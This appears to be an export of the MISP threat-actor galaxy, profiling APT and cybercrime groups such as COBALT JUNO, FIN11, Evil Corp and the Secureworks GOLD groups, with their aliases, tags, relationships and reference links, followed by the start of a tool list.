COBALT JUNO has operated since at least 2013 and focused on targets located in the Middle East including Iran, Jordan, Egypt & Lebanon. COBALT JUNO custom spyware families SABER1 and SABER2, include surveillance functionality and masquerade as legitimate software utilities such as Adobe Updater, StickyNote and ASKDownloader. CTU researchers assess with moderate confidence that COBALT JUNO operated the ZooPark Android spyware since at least mid-2015. ZooPark was publicly exposed in 2018 in both vendor reporting and a high profile leak of C2 server data. COBALT JUNO is linked to a private security company in Iran and outsources aspects of tool development work to commercial software developers. CTU researchers have observed the group using strategic web compromises to deliver malware. CTU researchers’ discovery of new C2 domains in 2019 suggest the group is still actively performing operations.

The tag is: `misp-galaxy:threat-actor="COBALT JUNO"`

COBALT JUNO is also known as:
COBALT KATANA

COBALT KATANA has been active since at least March 2018, and it focuses many of its operations on organizations based in or associated with Kuwait. The group has targeted government, logistics, and shipping organizations. The threat actors gain initial access to targets using DNS hijacking, strategic web compromise with SMB forced authentication, and password brute force attacks. COBALT KATANA operates a custom platform referred to as the Sakabota Framework, also referred to as Sakabota Core, with a complimentary set of modular backdoors and accessory tools including Gon, Hisoka, Hisoka Netero, Killua, Diezen, and Eye. The group has implemented DNS tunnelling in its malware and malicious scripts and also operates the HyphenShell web shell to strengthen post-intrusion access. CTU researchers assess with moderate confidence that COBALT KATANA operates on behalf of Iran, and elements of its operations such as overlapping infrastructure, use of DNS hijacking, implementation of DNS-based C2 channels in malware and web shell security mechanisms suggest connections to COBALT GYPSY and COBALT EDGEWATER.

The tag is: misp-galaxy:threat-actor="COBALT KATANA"

COBALT KATANA is also known as:

- Hive0081 (IBM)
- SectorD01 (NHSC)
- xHunt campaign (Palo Alto)

Dark Basin

Dark Basin is a hack-for-hire group that has targeted thousands of individuals and hundreds of institutions on six continents. Targets include advocacy groups and journalists, elected and senior government officials, hedge funds, and multiple industries. Dark Basin extensively targeted American nonprofits, including organisations working on a campaign called #ExxonKnew, which asserted that ExxonMobil hid information about climate change for decades. We also identify Dark Basin as the group behind the phishing of organizations working on net neutrality advocacy, previously reported by the Electronic Frontier Foundation. We link Dark Basin with high confidence to an Indian company, BellTroX InfoTech Services, and related entitie
GALLIUM

GALLIUM, is a threat actor believed to be targeting telecommunication providers over the world, mostly South-East Asia, Europe and Africa. To compromise targeted networks, GALLIUM target unpatched internet-facing services using publicly available exploits and have been known to target vulnerabilities in WildFly/JBoss.

The tag is: misp-galaxy:threat-actor="GALLIUM"

GALLIUM has relationships with:

- similar: misp-galaxy:threat-actor="Operation Soft Cell" with estimative-language:likelihood-probability="almost-certain"

TA413

Proofpoint researchers observed a phishing campaign impersonating the World Health Organization’s (WHO) guidance on COVID-19 critical preparedness to deliver a new malware family that researchers have dubbed Sepulcher. This campaign targeted European diplomatic and legislative bodies, non-profit policy research organizations, and global organizations dealing with economic affairs. Additionally, a sender email identified in this campaign has been linked to historic Chinese APT targeting of the international Tibetan community using payloads linked to LuckyCat malware. Subsequently, a phishing campaign from July 2020 targeting Tibetan dissidents was identified delivering the same strain of Sepulcher malware. Operator email accounts identified in this campaign have been publicly linked to historic Chinese APT campaigns targeting the Tibetan community delivering ExileRAT malware. Based on the use of publicly known sender addresses associated with Tibetan dissident targeting and the delivery of Sepulcher malware payloads, Proofpoint researchers have attributed both campaigns to the APT actor TA413, which has previously been documented in association with ExileRAT. The usage of publicly known Tibetan-themed sender accounts to deliver Sepulcher malware demonstrates a short-term realignment of TA413’s targets of interest. While best known for their campaigns against the Tibetan diaspora, this APT group associated with the Chinese state interest prioritized intelligence collection around Western economies reeling from COVID-19 in March 2020 before resuming more conventional
targeting later this year.

The tag is: `misp-galaxy:threat-actor="TA413"`

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**Evilnum**

ESET has analyzed the operations of Evilnum, the APT group behind the Evilnum malware previously seen in attacks against financial technology companies. While said malware has been seen in the wild since at least 2018 and documented previously, little has been published about the group behind it and how it operates. The group's targets remain fintech companies, but its toolset and infrastructure have evolved and now consist of a mix of custom, homemade malware combined with tools purchased from Golden Chickens, a Malware-as-a-Service (MaaS) provider whose infamous customers include FIN6 and Cobalt Group.

The tag is: `misp-galaxy:threat-actor="Evilnum"`

Evilnum is also known as:

- DeathStalker

---

**Fox Kitten**

PIONEER KITTEN is an Iran-based adversary that has been active since at least 2017 and has a suspected nexus to the Iranian government. This adversary appears to be primarily focused on gaining and maintaining access to entities possessing sensitive information of likely intelligence interest to the Iranian government. According to DRAGOS, they also targeted ICS-related entities using known VPN vulnerabilities. They are widely known to use open source penetration testing tools for reconnaissance and to establish encrypted communications.

The tag is: `misp-galaxy:threat-actor="Fox Kitten"`

Fox Kitten is also known as:

- PIONEER KITTEN
- PARISITE
XDSpy

Rare is the APT group that goes largely undetected for nine years, but XDSpy is just that; a previously undocumented espionage group that has been active since 2011. It has attracted very little public attention, with the exception of an advisory from the Belarusian CERT in February 2020. In the interim, the group has compromised many government agencies and private companies in Eastern Europe and the Balkans.

The tag is: `misp-galaxy:threat-actor="XDSpy"`

Evil Corp

Evil Corp is an international cybercrime network. In December of 2019 the US Federal Government offered a $5M bounty for information leading to the arrest and conviction of Maksim V. Yakubets for allegedly orchestrating Evil Corp operations. Responsible for stealing over $100M from businesses and consumers. The Evil Corp organization is known for utilizing custom strains of malware such as JabberZeus, Bugat and Dridex to steal banking credentials.

The tag is: `misp-galaxy:threat-actor="Evil Corp"`
Evil Corp is also known as:

- **GOLD DRAKE**

*Table 6202. Table References*

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<tr>
<td><a href="https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/">https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/</a></td>
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**TRACER KITTEN**

In April 2020, Crowstrike Falcon OverWatch discovered Iran-based adversary TRACER KITTEN conducting malicious interactive activity against multiple hosts at a telecommunications company in the Europe, Middle East and Africa (EMEA) region. The actor was found operating under valid user accounts, using custom backdoors in combination with SSH tunnels for C2. The adversary leveraged their foothold to conduct a variety of reconnaissance activities, undertake credential harvesting and prepare for data exfiltration.

The tag is: *misp-galaxy:threat-actor="TRACER KITTEN"*

*Table 6203. Table References*

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**FIN11**

FIN11 is a well-established financial crime group that has recently focused its operations on ransomware and extortion. The group has been active since 2017 and has been tracked under UNC902 and later on as TEMP.Warlok. In some ways, FIN11 is reminiscent of APT1; they are notable not for their sophistication, but for their sheer volume of activity. (FireEye) Mandiant has also responded to numerous FIN11 intrusions, but we’ve only observed the group successfully monetize access in few instances. This could suggest that the actors cast a wide net during their phishing operations, then choose which victims to further exploit based on characteristics such as sector, geolocation or perceived security posture. Recently, FIN11 has deployed CLOP ransomware and threatened to publish exfiltrated data to pressure victims into paying ransom demands. The group's shifting monetization methods—from point-of-sale (POS) malware in 2018, to ransomware in 2019, and hybrid extortion in 2020—is part of a larger trend in which criminal actors have increasingly focused on post-compromise ransomware deployment and data theft extortion. Notably, FIN11 includes a subset of the activity security researchers call TA505, Graceful Spider, Gold Evergreen, but we do not attribute TA505's early operations to FIN11 and caution against using the names interchangeably. Attribution of both historic TA505 activity and more recent FIN11 activity is complicated by the actors’ use of criminal service providers. Like most financially motivated actors,
FIN11 doesn’t operate in a vacuum. We believe that the group has used services that provide anonymous domain registration, bulletproof hosting, code signing certificates, and private or semi-private malware. Outsourcing work to these criminal service providers likely enables FIN11 to increase the scale and sophistication of their operations.

The tag is: misp-galaxy:threat-actor="FIN11"

FIN11 is also known as:

- TEMP.Warlock

Table 6204. Table References

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<tr>
<td><a href="https://www.brighttalk.com/webcast/7451/447347">https://www.brighttalk.com/webcast/7451/447347</a></td>
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**UNC1878**

UNC1878 is a financially motivated threat actor that monetizes network access via the deployment of RYUK ransomware. Earlier this year, Mandiant published a blog on a fast-moving adversary deploying RYUK ransomware, UNC1878. Shortly after its release, there was a significant decrease in observed UNC1878 intrusions and RYUK activity overall almost completely vanishing over the summer. But beginning in early fall, Mandiant has seen a resurgence of RYUK along with TTP overlaps indicating that UNC1878 has returned from the grave and resumed their operations.

The tag is: misp-galaxy:threat-actor="UNC1878"

Table 6205. Table References

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**Operation Skeleton Key**

Throughout 2019, multiple companies in the Taiwan high-tech ecosystem were victims of an advanced persistent threat (APT) attack. Due to these APT attacks having similar behavior profiles (similar adversarial techniques, tactics, and procedures or TTP) with each other and previously
documented cyberattacks, CyCraft assess with high confidence these new attacks were conducted by the same foreign threat actor. During their investigation, they dubbed this threat actor Chimera. “Chimera” stands for the synthesis of hacker tools that they’ve seen the group use, such as the skeleton key malware that contained code extracted from both Dumpert and Mimikatz — hence Chimera. Their operation — the entirety of the new attacks utilizing the Skeleton Key attack (described below) from late 2018 to late 2019, CyCraft have dubbed Operation Skeleton Key.

The tag is: misp-galaxy:threat-actor="Operation Skeleton Key"

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**Table 6206. Table References**

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**UNC2452**

Reporting regarding activity related to the SolarWinds supply chain injection has grown quickly since initial disclosure on 13 December 2020. A significant amount of press reporting has focused on the identification of the actor(s) involved, victim organizations, possible campaign timeline, and potential impact. The US Government and cyber community have also provided detailed information on how the campaign was likely conducted and some of the malware used. MITRE’s ATT&CK team — with the assistance of contributors — has been mapping techniques used by the actor group, referred to as UNC2452/Dark Halo by FireEye and Volexity respectively, as well as SUNBURST and TEARDROP malware.

The tag is: misp-galaxy:threat-actor="UNC2452"

UNC2452 is also known as:

- DarkHalo
- StellarParticle
- NOBELIUM

UNC2452 has relationships with:

- similar: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

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**Table 6207. Table References**

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TeamTNT

In early February, 2021 TeamTNT launched a new campaign against Docker and Kubernetes environments. Using a collection of container images that are hosted in Docker Hub, the attackers are targeting misconfigured docker daemons, Kubeflow dashboards, and Weave Scope, exploiting these environments in order to steal cloud credentials, open backdoors, mine cryptocurrency, and launch a worm that is looking for the next victim. They’re linked to the First Crypto-Mining Worm to Steal AWS Credentials and Hildegard Cryptojacking malware. TeamTNT is a relatively recent addition to a growing number of threats targeting the cloud. While they employ some of the same tactics as similar groups, TeamTNT stands out with their social media presence and penchant for self-promotion. Tweets from the TeamTNT’s account are in both English and German although it is unknown if they are located in Germany.

The tag is: misp-galaxy:threat-actor="TeamTNT"

Table 6208. Table References

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HAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures. HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once they've gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA. In campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets' environments. HAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.

The tag is: misp-galaxy:threat-actor="HAFNIUM"

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RedEcho

RedEcho: The group made heavy use of AXIOMATICASYMPTOTE — a term we use to track infrastructure that comprises ShadowPad C2s, which is shared between several Chinese threat activity groups

The tag is: misp-galaxy:threat-actor="RedEcho"

Table 6210. Table References

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Ghostwriter

Ghostwriter is referred as an ‘activity set’, with various incidents tied together by overlapping behavioral characteristics and personas, rather than as an actor or group in itself.

The tag is: misp-galaxy:threat-actor="Ghostwriter"

Table 6211. Table References

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Yanbian Gang

RiskIQ characterizes the Yanbian Gang as a group that targeted South Korean Android mobile banking customers since 2013 with malicious Android apps purporting to be from major banks,
namely Shinhan Savings Bank, Saemaul Geumgo, Shinhan Finance, KB Kookmin Bank, and NH Savings Bank.

The tag is: `misp-galaxy:threat-actor="Yanbian Gang"`

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### TRAVELING SPIDER

Crowdstrike Tracks the criminal developer of Nemty ransomware as TRAVELING SPIDER. The actor has been observed to take advantage of single-factor authentication to gain access to victim organizations through Citrix Gateway and send extortion-related emails using the victim’s own Microsoft Office 365 instance.

The tag is: `misp-galaxy:threat-actor="TRAVELING SPIDER"`

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### MALLARD SPIDER

Crowdstrike tarcks the operators behind the Qbot as MALLARD SPIDER

The tag is: `misp-galaxy:threat-actor="MALLARD SPIDER"`

MALLARD SPIDER is also known as:

- **GOLD LAGOON**

### Table 6214. Table References
RIDDLE SPIDER

According to Crowdstrike, RIDDLE SPIDER is the operator behind the avaddon ransomware.

The tag is: misp-galaxy:threat-actor="RIDDLE SPIDER"

GOLD DUPONT

GOLD DUPONT is a financially motivated cybercriminal threat group that specializes in post-intrusion ransomware attacks using 777 (aka Defray777 or RansomExx) malware. Active since November 2018, GOLD DUPONT establishes initial access into victim networks using stolen credentials to remote access services like virtual desktop infrastructure (VDI) or virtual private networks (VPN). From October 2019 to early 2020 the group used GOLD BLACKBURN’s TrickBot malware as an initial access vector (IAV) during some intrusions. Since July 2020, the group has also used GOLD SWATHMORE’s IcedID (Bokbot) malware as an IAV in some intrusions.

The tag is: misp-galaxy:threat-actor="GOLD DUPONT"

GOLD DUPONT is also known as:

• SPRITE SPIDER

KNOCKOUT SPIDER

KNOCKOUT SPIDER has conducted low-volume spear-phishing campaigns focused on companies involved in cryptocurrency.

The tag is: misp-galaxy:threat-actor="KNOCKOUT SPIDER"
SOLAR SPIDER

SOLAR SPIDER's phishing campaigns deliver the JSOutProx RAT to financial institutions across Africa, the Middle East, South Asia and Southeast Asia.

The tag is: misp-galaxy:threat-actor="SOLAR SPIDER"

VIKING SPIDER

VIKING SPIDER is the criminal group behind the development and distribution of Ragnar Locker ransomware. While public reporting indicates the group began threatening to leak victim data in February 2020, a DLS was not observed until April 2020. The DLS is hosted on Tor, and similar to other actors, proof of data exfiltration is provided before the stolen data is fully leaked. It was also noted that on Dec. 22, 2020, a new post made to MountLocker ransomware's Tor-hosted DLS was titled 'Cartel News' and included details of a victim of VIKING SPIDER's Ragnar Locker

The tag is: misp-galaxy:threat-actor="VIKING SPIDER"

CIRCUS SPIDER

According to Crowdstrike, the NetWalker ransomware is being developed and maintained by a Russian-speaking actor designated as CIRCUS SPIDER. Initially discovered in September 2019 and having a compilation timestamp dating back to 28 August 2019, NetWalker has been found to be used in Big Game Hunting (BGH)-style operations while also being distributed via spam. CIRCUS SPIDER is advertising NetWalker as a closed-affiliate program, and verifies applicants before they are being accepted as an affiliate. The requirements range from providing proof of previous
revenue in similar affiliates programs, experience in the field and what type of industry the applicant is targeting.

The tag is: misp-galaxy:threat-actor="CIRCUS SPIDER"

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GOLD EVERGREEN

GOLD EVERGREEN was a financially motivated cybercriminal threat group that operated the Gameover Zeus (aka Mapp, P2P Zeus) botnet until June 2014. It encompasses an expansive and long running criminal conspiracy operated by a confederation of individuals calling themselves The Business Club from the mid 2000s until 2014. GOLD EVERGREEN’s technical operation was facilitated primarily through botnets using the Zeus, JabberZeus, and eventually Gameover Zeus malware families. These malware families were designed and maintained by a Russian national Evgeniy Bogachev (aka ‘slavik’) who was indicted by the U.S. DOJ in 2014 and remains a fugitive.

The tag is: misp-galaxy:threat-actor="GOLD EVERGREEN"

Table 6221. Table References

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://www.secureworks.com/research/threat-profiles/gold-evergreen">http://www.secureworks.com/research/threat-profiles/gold-evergreen</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group">https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group</a></td>
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</table>

BAMBOO SPIDER

Crowdstrike tracks the developer of Panda Zeus as BAMBOO SPIDER

The tag is: misp-galaxy:threat-actor="BAMBOO SPIDER"

Table 6222. Table References

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<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/">https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/</a></td>
</tr>
</tbody>
</table>

BOSON SPIDER

BOSON SPIDER is a cyber criminal group, which was first identified in 2015, recently and inexplicably went dark in the spring of 2016, appears to be a tightly knit group operating out of
Eastern Europe. They have used a variety of distribution mechanisms such as the infamous (and now defunct) angler exploit kit, and obfuscated JavaScript to reduce the detection by antivirus solutions.

The tag is: *misp-galaxy:threat-actor="BOSON SPIDER"

### OVERLORD SPIDER

OVERLORD SPIDER, aka The Dark Overlord. Similar to ransomware operators today, OVERLORD SPIDER likely purchased RDP access to compromised servers on underground forums in order to exfiltrate data from corporate networks. The actor was known to attempt to “sell back” the data to the respective victims, threatening to sell the data to interested parties should the victim refuse to pay. There was at least one identified instance of OVERLORD SPIDER successfully selling victim data on an underground market.

The tag is: *misp-galaxy:threat-actor="OVERLORD SPIDER"

### OUTLAW SPIDER

On May 7, 2019, Mayor Bernard “Jack” Young confirmed that the network for the U.S. City of Baltimore (CoB) was infected with ransomware, which was announced via Twitter1. This infection was later confirmed to be conducted by OUTLAW SPIDER, which is the actor behind the RobbinHood ransomware. The actor demanded to be paid 3 BTC (approximately $17,600 USD at the time) per infected system, or 13 BTC (approximately $76,500 USD at the time) for all infected systems to recover the city’s files.

The tag is: *misp-galaxy:threat-actor="OUTLAW SPIDER"

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**Table 6223. Table References**

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<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report_BosonSpider.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report_BosonSpider.pdf</a></td>
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<tr>
<td><a href="https://www.crowdstrike.com/blog/ecrime-ecosystem/">https://www.crowdstrike.com/blog/ecrime-ecosystem/</a></td>
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<td><a href="https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/">https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/</a></td>
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<tr>
<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
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</table>
MIMIC SPIDER

MIMIC SPIDER is mentioned in two summary reports only

The tag is: `misp-galaxy:threat-actor="MIMIC SPIDER"`

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HOUND SPIDER

According to Crowdstrike, HOUND SPIDER affiliates arrested in Romania on December, 2017

The tag is: `misp-galaxy:threat-actor="HOUND SPIDER"`

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GOLD BURLAP

GOLD BURLAP is a group of financially motivated criminals responsible for the development of the Pysa ransomware, also referred to as Mespinoza. Pysa is a cross-platform ransomware with known versions written in C++ and Python. As of December 2020, approximately 50 organizations had reportedly been targeted in Pysa ransomware attacks. The operators leverage 'name and shame' tactics to apply additional pressure to victims. As of January 2021, CTU researchers had found no Pysa advertisements on underground forums, which likely indicates that it is not operated as ransomware as a service (RaaS).

The tag is: `misp-galaxy:threat-actor="GOLD BURLAP"`

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<td><a href="http://www.secureworks.com/research/threat-profiles/gold-burlap">http://www.secureworks.com/research/threat-profiles/gold-burlap</a></td>
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GOLD CABIN

GOLD CABIN is a financially motivated cybercriminal threat group operating a malware distribution service on behalf of numerous customers since 2018. GOLD CABIN uses malicious documents, often contained in password-protected archives, delivered through email to download and execute payloads. The second-stage payloads are most frequently Gozi ISFB (Ursnif) or IcedID (Bokbot), sometimes using intermediary malware like Valak. GOLD CABIN infrastructure relies on
artificial appearing and frequently changing URLs created with a domain generation algorithm (DGA). The URLs host a PHP object that returns the malware as a DLL file.

The tag is: misp-galaxy:threat-actor="GOLD CABIN"

GOLD CABIN is also known as:

- Shaktak
- TA551

Table 6229. Table References

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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/gold-cabin">https://www.secureworks.com/research/threat-profiles/gold-cabin</a></td>
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**GOLD FAIRFAX**

GOLD FAIRFAX is a financially motivated cybercriminal threat group responsible for the creation, distribution, and operation of the Ramnit botnet. Ramnit, the phonetic spelling of RMNet, the internal name of the core module, began operation in April 2010 and became widespread in July 2010. A particularly virulent file-infecting component of early Ramnit variants that spreads by modifying executables and HTML files has resulted in the continued prevalence of those early variants. Currently, Ramnit remains an actively maintained and distributed threat. The intent of Ramnit is to intercept and manipulate online financial transactions through modification of web browser behavior ('man-in-the-browser').

The tag is: misp-galaxy:threat-actor="GOLD FAIRFAX"

Table 6230. Table References

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**GOLD FLANDERS**

GOLD FLANDERS is a financially motivated group responsible for distributed denial of service (DDOS) attacks linked to extortion emails demanding between 5 and 30 bitcoins. The attacks consist mostly of fragmented UDP packets (DNS and NTP reflection) as well as other traffic that can vary per victim. The arrival of the extortion email is timed to coincide with a DDOS attack consisting of traffic between 20 Gbps and 200 Gbps and 12-15 million packets per second, lasting between 20 and 70 minutes targeted at a particular Autonomous System Number (ASN) or group of IP addresses. In some cases victim organisations have replied to these extortion emails and received personal replies from GOLD FLANDERS operators within 20 minutes.

The tag is: misp-galaxy:threat-actor="GOLD FLANDERS"

Table 6231. Table References

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GOLD GALLEON

GOLD GALLEON is a financially motivated cybercriminal threat group comprised of at least 20 criminal associates that collectively carry out business email compromise (BEC) and spoofing (BES) campaigns. The group appears to specifically target maritime organizations and their customers. CTU researchers have observed GOLD GALLEON targeting firms in South Korea, Japan, Singapore, Philippines, Norway, U.S., Egypt, Saudi Arabia, and Colombia. The threat actors leverage tools, tactics, and procedures that are similar to those used by other BEC/BES groups CTU researchers have previously investigated, such as GOLD SKYLINE. The groups have used the same caliber of publicly available malware (inexpensive and commodity remote access trojans), crypters, and email lures.

The tag is: misp-galaxy:threat-actor="GOLD GALLEON"

Table 6232. Table References

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<tr>
<td><a href="https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry">https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry</a></td>
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GOLD GARDEN

GOLD GARDEN was a financially motivated cybercriminal threat group that authored and operated the GandCrab ransomware from January 2018 through May 2019. GandCrab was operated as a ransomware-as-a-service operation whereby numerous affiliates distributed the malware and split ransom payments with the core operators. GOLD GARDEN maintained exclusive control of the development of GandCrab and associated command and control (C2) infrastructure. Individual affiliates, of which there were frequently more than a dozen in operation simultaneously, coordinated the distribution of GandCrab through spam emails, web exploit kits, pay-per-install botnets, and scan-and-exploit style attacks. On May 31, 2019 the operators announced they have halted operations with no intent to resume for unknown reasons. In April 2019 the operators of GOLD GARDEN transferred the source code of GandCrab to GOLD SOUTHFIELD who used it as the foundation of the REvil ransomware operation. GOLD SOUTHFIELD operates a similar affiliate program comprised largely of former GandCrab users and other groups recruited from underground forums.

The tag is: misp-galaxy:threat-actor="GOLD GARDEN"

Table 6233. Table References

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<td><a href="http://www.secureworks.com/research/threat-profiles/gold-garden">http://www.secureworks.com/research/threat-profiles/gold-garden</a></td>
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</table>
GOLD MANSARD

GOLD MANSARD is a financially motivated cybercriminal threat group that operated the Nemty ransomware from August 2019. The threat actor behind Nemty is known on Russian underground forums as 'jsworm'. Nemty was operated as a ransomware as a service (RaaS) affiliate program and featured a 'name and shame' website where exfiltrated victim data was leaked. In April 2020, jsworm appeared to acquire new partners and retired the Nemty ransomware. This was followed by the introduction of Nefilim ransomware, which does not operate as an affiliate model. Nefilim has been used in post-intrusion ransomware attacks against organizations in logistics, telecommunications, energy and other sectors.

The tag is: *misp-galaxy:threat-actor=*"GOLD MANSARD"

Table 6234. Table References

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<td><a href="http://www.secureworks.com/research/threat-profiles/gold-mansard">http://www.secureworks.com/research/threat-profiles/gold-mansard</a></td>
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GOLD NORTHFIELD

Operational since at least October 2020, GOLD NORTHFIELD is a financially motivated cybercriminal threat group that leverages GOLD SOUTHFIELD’s REvil ransomware in their attacks. To do this, the threat actors replace the configuration of the REvil ransomware binary with their own in an effort to repurpose the ransomware for their operations. GOLD NORTHFIELD has given this modified REvil ransomware variant the name 'LV ransomware'.

The tag is: *misp-galaxy:threat-actor=*"GOLD NORTHFIELD"

Table 6235. Table References

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<td><a href="http://www.secureworks.com/research/threat-profiles/gold-northfield">http://www.secureworks.com/research/threat-profiles/gold-northfield</a></td>
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GOLD RIVERVIEW

GOLD RIVERVIEW was a financially motivated cybercriminal group that facilitated the distribution of malware- and scam-laden spam email on behalf of its customers. This threat group authored and sold the Necurs rootkit beginning in early 2014, including to GOLD EVERGREEN who integrated it into Gameover Zeus. GOLD RIVERVIEW also operated a global botnet that was colloquially known as Necurs (CraP2P) and was a major source of spam email from 2016 through 2018. Necurs distributed malware such as GOLD DRAKE’s Dridex (Bugat v5), GOLD BLACKBURN’s TrickBot, and other families like Locky and FlawedAmmy. Necurs also distributed a large volume of email pushing securities 'pump and dump' scams, rogue pharmacies, and fraudulent dating sites. On March 4, 2019 all three active segments of the Necurs botnet ceased operation and have not since resumed. On March 10, 2020 Microsoft took civil action against GOLD RIVERVIEW and made
technical steps that would complicate the threat actors’ ability to reconstitute the botnet.

The tag is: `misp-galaxy:threat-actor="GOLD RIVerview"`

**GOLD SKYLINE**

GOLD SKYLINE is a financially motivated cybercriminal threat group operating from Nigeria engaged in high-value wire fraud facilitated by business email compromise (BEC) and spoofing (BES). Also known as Wire-Wire Group 1 (WWG1), GOLD SKYLINE has been active since at least 2016 and relies heavily on compromised email accounts, social engineering, and increasingly malware to divert inter-organization funds transfers.

The tag is: `misp-galaxy:threat-actor="GOLD SKYLINE"`

**GOLD SOUTHFIELD**

GOLD SOUTHFIELD is a financially motivated cybercriminal threat group that authors and operates the REvil (aka Sodinokibi) ransomware on behalf of various affiliated threat groups. Operational since April 2019, the group obtained the GandCrab source code from GOLD GARDEN, the operators of GandCrab that voluntarily withdrew their ransomware from underground markets in May 2019. GOLD SOUTHFIELD is responsible for authoring REvil and operating the backend infrastructure used by affiliates (also called partners) to create malware builds and to collect ransom payments from victims. CTU researchers assess with high confidence that GOLD SOUTHFIELD is a former GandCrab affiliate and continues to work with other former GandCrab affiliates.

The tag is: `misp-galaxy:threat-actor="GOLD SOUTHFIELD"`
GOLD SYMPHONY

GOLD SYMPHONY is a financially motivated cybercrime group, likely based in Russia, that is responsible for the development and sale on underground forums of the Buer Loader malware. First discovered around August 2019, Buer Loader is offered as a malware-as-a-service (MasS) and has been advertised by a threat actor using the handle 'memeos'. Customers include GOLD BLACKBURN, the operators of the TrickBot malware. In addition to TrickBot, Buer Loader has been reported to download Cobalt Strike and other tools for use in post-intrusion ransomware attacks.

The tag is: misp-galaxy:threat-actor="GOLD SYMPHONY"

Table 6239. Table References

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<td><a href="http://www.secureworks.com/research/threat-profiles/gold-symphony">http://www.secureworks.com/research/threat-profiles/gold-symphony</a></td>
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GOLD WATERFALL

GOLD WATERFALL is a group of financially motivated cybercriminals responsible for the creation, distribution, and operation of the Darkside ransomware. Active since August 2020, GOLD WATERFALL uses a variety of tactics, techniques, and procedures (TTPs) to infiltrate and move laterally within targeted organizations to deploy Darkside ransomware to its most valuable resources. Among these TTPs are using malicious documents delivered by email to establish a foothold and using stolen credentials to access victims’ remote access services. In November 2020, the ‘darksupp’ persona was observed advertising an affiliate program on several semi-exclusive underground forums, marking GOLD WATERFALL’s entry into the ransomware-as-a-service (RaaS) landscape.

The tag is: misp-galaxy:threat-actor="GOLD WATERFALL"

Table 6240. Table References

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<td><a href="https://www.secureworks.com/research/threat-profiles/gold-waterfall">https://www.secureworks.com/research/threat-profiles/gold-waterfall</a></td>
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<td><a href="https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access">https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access</a></td>
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GOLD WINTER

GOLD WINTER are a financially motivated group, likely based in Russia, who operate the Hades ransomware. Hades activity was first identified in December 2020 and its lack of presence on underground forums and marketplaces leads CTU researchers to conclude that it is not operated under a ransomware as a service affiliate model. GOLD WINTER do employ name-and-shame tactics, where data is stolen and used as additional leverage over victims, but rather than a single centralized leak site CTU researchers have observed the group using Tor sites customized for each victim that include a Tox chat ID for communication, which also appears to be unique for each victim.
BackdoorDiplomacy

An APT group that we are calling BackdoorDiplomacy, due to the main vertical of its victims, has been targeting Ministries of Foreign Affairs and telecommunication companies in Africa and the Middle East since at least 2017.

Gelsemium

The Gelsemium group has been active since at least 2014 and was described in the past by a few security companies. Gelsemium’s name comes from one possible translation ESET found while reading a report from VenusTech who dubbed the group 狼毒草 for the first time. It's the name of a genus of flowering plants belonging to the family Gelsemiaceae, Gelsemium elegans is the species that contains toxic compounds like Gelsemine, Gelsenicine and Gelsevirine, which ESET choses as names for the three components of this malware family.
BelialDemon

Mentioned as operator of TriumphLoader and Matanbuchus

The tag is: `misp-galaxy:threat-actor="BelialDemon"`

BelialDemon is also known as:

- Matanbuchus

Table 6244. Table References

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<tr>
<td><a href="https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/">https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/</a></td>
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Tool

threat-actor-tools is an enumeration of tools used by adversaries. The list includes malware but also common software regularly used by the adversaries.

Tool is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.

authors

Alexandre Dulaunoy - Florian Roth - Timo Steffens - Christophe Vandeplas - Dennis Rand - raw-data

Tinba

Banking Malware

The tag is: `misp-galaxy:tool="Tinba"`

Tinba is also known as:

- Hunter
- Zusy
- TinyBanker

Tinba has relationships with:

- similar: `misp-galaxy:exploit-kit="Hunter"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:banker="Tinba"` with `estimative-language:likelihood-probability="likely"`
PlugX

Malware

The tag is: *misp-galaxy:tool=*PlugX*

PlugX is also known as:

- Backdoor.FSZO-5117
- Trojan.Heur.JP.juW@ayZZvMb
- Trojan.Inject1.6386
- Korplug
- Agent.dhwf

PlugX has relationships with:

- similar: *misp-galaxy:rat=*PlugX* with estimative-language:likelihood-probability="likely"
- similar: *misp-galaxy:mitre-malware=*PlugX - S0013* with estimative-language:likelihood-probability="likely"
- similar: *misp-galaxy:malpedia=*PlugX* with estimative-language:likelihood-probability="likely"

MSUpdater

Trojan (RAT) linked to current targeted attacks and others dating back to at least early 2009

